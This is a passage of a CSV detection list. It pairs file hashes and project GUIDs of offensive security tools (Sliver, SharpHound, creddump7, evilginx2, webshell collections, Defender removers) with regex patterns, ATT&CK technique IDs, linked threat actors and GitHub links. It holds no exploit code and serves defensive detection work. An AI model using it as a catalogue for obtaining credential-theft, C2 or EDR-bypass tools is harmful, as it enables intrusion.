KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","25725" "*4581d0993624a9dab870f29d66f0acb39db89b818de62d8f345de3155340066f*",".{0,1000}4581d0993624a9dab870f29d66f0acb39db89b818de62d8f345de3155340066f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25726" "*4586fbacf5d78e868b9b823f3109d05f73bc30cc111d1af34db3e0bb54655dc2*",".{0,1000}4586fbacf5d78e868b9b823f3109d05f73bc30cc111d1af34db3e0bb54655dc2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25729" "*4592e0848e4929ac2b6ba4593f8cbfe09f52ce6ca4206ce52087a31073903645*",".{0,1000}4592e0848e4929ac2b6ba4593f8cbfe09f52ce6ca4206ce52087a31073903645.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral 
Movement","https://github.com/0xthirteen/SharpMove","1","0","#filehash","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","25730" "*4593dbaecd6d4e05d7aa7e2cb8cc8ce4b9d1ccc1a6b26e40fdf72fd8a80e7d07*",".{0,1000}4593dbaecd6d4e05d7aa7e2cb8cc8ce4b9d1ccc1a6b26e40fdf72fd8a80e7d07.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25731" "*4595ba305652431a89d142e09e6e5a9e67515bec0864017e8331082d3004611f*",".{0,1000}4595ba305652431a89d142e09e6e5a9e67515bec0864017e8331082d3004611f.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","25732" "*459a943f33a20359d1f2dd896ad3ad7c5eb791582c124e851dd2dca6f2088051*",".{0,1000}459a943f33a20359d1f2dd896ad3ad7c5eb791582c124e851dd2dca6f2088051.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25733" 
"*45a2c28d5ee54ff89dcdb82fd23110e353a740277ec8d6ae0683a111877324cf*",".{0,1000}45a2c28d5ee54ff89dcdb82fd23110e353a740277ec8d6ae0683a111877324cf.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25735" "*45a81bd15482f0fa6be511d3590b8c8d550e80362b5dfe10edc2488043c48cbc*",".{0,1000}45a81bd15482f0fa6be511d3590b8c8d550e80362b5dfe10edc2488043c48cbc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25736" "*45a8664a10f0b5f30e458aed00e46378dae5e8b3e6e208394a83e1d080b8a978*",".{0,1000}45a8664a10f0b5f30e458aed00e46378dae5e8b3e6e208394a83e1d080b8a978.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25737" 
"*45ac6b7f8086f9f50624985e018dc4869cf5a4bb9c831d76cc0d1eeb1baf2105*",".{0,1000}45ac6b7f8086f9f50624985e018dc4869cf5a4bb9c831d76cc0d1eeb1baf2105.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","25739" "*45adfa7ad271498293d298a774c19e47c94046648c680343b47361fc64bb1fa3*",".{0,1000}45adfa7ad271498293d298a774c19e47c94046648c680343b47361fc64bb1fa3.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","25740" "*45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace*",".{0,1000}45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","25742" "*45cc6eff2c3a6facb1aa9e31f2ce7d45d7b5527633c54d9deb5de1f19ffc906d*",".{0,1000}45cc6eff2c3a6facb1aa9e31f2ce7d45d7b5527633c54d9deb5de1f19ffc906d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25743" "*45D59D79-EF51-4A93-AAFA-2879FFC3A62C*",".{0,1000}45D59D79\-EF51\-4A93\-AAFA\-2879FFC3A62C.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#GUIDproject","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","25744" "*45d8e1aafeb7361581def6751c201b11cd2a9761f1c19d17925f72fda78328bc*",".{0,1000}45d8e1aafeb7361581def6751c201b11cd2a9761f1c19d17925f72fda78328bc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25746" "*45e1b189f8a3f50c1c1b88dd8cc05e915cad79e9ff98ef589a42e72cbe07aae3*",".{0,1000}45e1b189f8a3f50c1c1b88dd8cc05e915cad79e9ff98ef589a42e72cbe07aae3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25747" "*45ea038d3721285f2759d8c8f3740cbb9cb9400a0cf76d11d84e089bd99ed1a9*",".{0,1000}45ea038d3721285f2759d8c8f3740cbb9cb9400a0cf76d11d84e089bd99ed1a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25748" "*45ebedf8240705e9da3b89591d6e0203764e94a1ba5ebaf999627012e06bebd3*",".{0,1000}45ebedf8240705e9da3b89591d6e0203764e94a1ba5ebaf999627012e06bebd3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25749" "*45fd8c64f22872051c84e5c5fe48749ee7ada07a51a1b263dc75c6ccd2567922*",".{0,1000}45fd8c64f22872051c84e5c5fe48749ee7ada07a51a1b263dc75c6ccd2567922.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","25753" "*45ff440d387c984f8bd7be1d1bc77cd9eaf70aa513a2a4c80189294a0f70c411*",".{0,1000}45ff440d387c984f8bd7be1d1bc77cd9eaf70aa513a2a4c80189294a0f70c411.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","25754" "*4602cabfd4c313a8f51dfee4f0fdd32b5a97d5913945ca8a3e267a01d4f167de*",".{0,1000}4602cabfd4c313a8f51dfee4f0fdd32b5a97d5913945ca8a3e267a01d4f167de.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25756" "*461356f9bd764b57b3b9a1457aa60494ae73a7935133f5b6122edcb286b7ef0a*",".{0,1000}461356f9bd764b57b3b9a1457aa60494ae73a7935133f5b6122edcb286b7ef0a.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","#filehash","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","25758" "*4614a6da343623fc820d89d35b8c2a26fe69abf357af7ef7602e52808fbe8611*",".{0,1000}4614a6da343623fc820d89d35b8c2a26fe69abf357af7ef7602e52808fbe8611.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor 
authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","25760" "*461df8ad66af0d6635bc8e389f307569c01f1b589319b8a887578b221c943b03*",".{0,1000}461df8ad66af0d6635bc8e389f307569c01f1b589319b8a887578b221c943b03.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#filehash","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","25763" "*461F72D2-6BDC-4D0E-82EE-59A811AB4844*",".{0,1000}461F72D2\-6BDC\-4D0E\-82EE\-59A811AB4844.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#GUIDproject","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","25764" "*4621d400f556301fd9ba40c1325a65727b4eb564eeda5fb0368f547eec603ff3*",".{0,1000}4621d400f556301fd9ba40c1325a65727b4eb564eeda5fb0368f547eec603ff3.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","25765" "*46281222e0c038fb6b34921405aa98b5adc07d97f0074e1eb9488cab9b6b7778*",".{0,1000}46281222e0c038fb6b34921405aa98b5adc07d97f0074e1eb9488cab9b6b7778.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25767" "*4628fdac0a217dd268e3f962a7665348eb9cf64bda81313cbfb1617008a9dc2e*",".{0,1000}4628fdac0a217dd268e3f962a7665348eb9cf64bda81313cbfb1617008a9dc2e.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","25768" "*462f4b3e28c75c1b61770cf570c1650be5142a10efd9af8a7f15ada70cb061cf*",".{0,1000}462f4b3e28c75c1b61770cf570c1650be5142a10efd9af8a7f15ada70cb061cf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25769" "*463183549b3e427b66613231ef130febb24b0c555747528075e1168fc627765f*",".{0,1000}463183549b3e427b66613231ef130febb24b0c555747528075e1168fc627765f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous 
webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25771" "*463dd406d25b3d6a4198ff373a8f236333c83f10fe9cff6791f2fbc210a73ad7*",".{0,1000}463dd406d25b3d6a4198ff373a8f236333c83f10fe9cff6791f2fbc210a73ad7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25772" "*464b89245a6eb6429d6588c6f9b15e5a158e41be1f7ae9ccb6e3b3ba0ca6106d*",".{0,1000}464b89245a6eb6429d6588c6f9b15e5a158e41be1f7ae9ccb6e3b3ba0ca6106d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25773" "*4658ae8a4a3005961327d9b009027b5fdb9e847dc055e4f303ea977639662ca7*",".{0,1000}4658ae8a4a3005961327d9b009027b5fdb9e847dc055e4f303ea977639662ca7.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash 
#linux","N/A","5","","N/A","","","","25776" "*465a40473aa4e631668c9d2a28bf7d3821bc124527c873511563eb53d3829e09*",".{0,1000}465a40473aa4e631668c9d2a28bf7d3821bc124527c873511563eb53d3829e09.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","25777" "*465a8ba788d324313ccf9d344f35ce5d1d4153d0367c6f647bfa817be18934ce*",".{0,1000}465a8ba788d324313ccf9d344f35ce5d1d4153d0367c6f647bfa817be18934ce.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","#filehash","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","25778" "*4665bf3f84b00ec83f005ea4feb3617acf032a69826013656a04683865c204f6*",".{0,1000}4665bf3f84b00ec83f005ea4feb3617acf032a69826013656a04683865c204f6.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","25779" "*4672ac01c62257129756f1d9f0ae1fd2471de6f78e47fa906af47e22204d917b*",".{0,1000}4672ac01c62257129756f1d9f0ae1fd2471de6f78e47fa906af47e22204d917b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25786" "*46793c55c24e616a0d4eaaa0090b70bdde05e50c1b58da753d09063e6e838cc6*",".{0,1000}46793c55c24e616a0d4eaaa0090b70bdde05e50c1b58da753d09063e6e838cc6.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","25787" "*46793c55c24e616a0d4eaaa0090b70bdde05e50c1b58da753d09063e6e838cc6*",".{0,1000}46793c55c24e616a0d4eaaa0090b70bdde05e50c1b58da753d09063e6e838cc6.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","25788" "*467bdf16e6c642b993a999efdfe9beaa4d4eb7eb9d94670703dd75bfc6f48f65*",".{0,1000}467bdf16e6c642b993a999efdfe9beaa4d4eb7eb9d94670703dd75bfc6f48f65.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25789" "*4681186a8bcaff98f0d2513d30add67345491b95f7f743883e6ca2506ba7aaaf*",".{0,1000}4681186a8bcaff98f0d2513d30add67345491b95f7f743883e6ca2506ba7aaaf.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","25791" "*4695acbd22ff9cce0fa585459cbaaf879ffdd59f0f6f583074902c34773e6293*",".{0,1000}4695acbd22ff9cce0fa585459cbaaf879ffdd59f0f6f583074902c34773e6293.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25798" "*469796062be14876fd4a7f37c4cab22bac6ccee6a9c3e90c696b5901fe22f13a*",".{0,1000}469796062be14876fd4a7f37c4cab22bac6ccee6a9c3e90c696b5901fe22f13a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25799" "*46993522-7D77-4B59-9B77-F82082DE9D81*",".{0,1000}\s\'46993522\-7D77\-4B59\-9B77\-F82082DE9D81\'\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#GUIDproject","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","25800" "*469e77c37fbde99cddbaeedd98701e6344665931f382dce3ba36e9e4ea4c3a00*",".{0,1000}469e77c37fbde99cddbaeedd98701e6344665931f382dce3ba36e9e4ea4c3a00.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25802" 
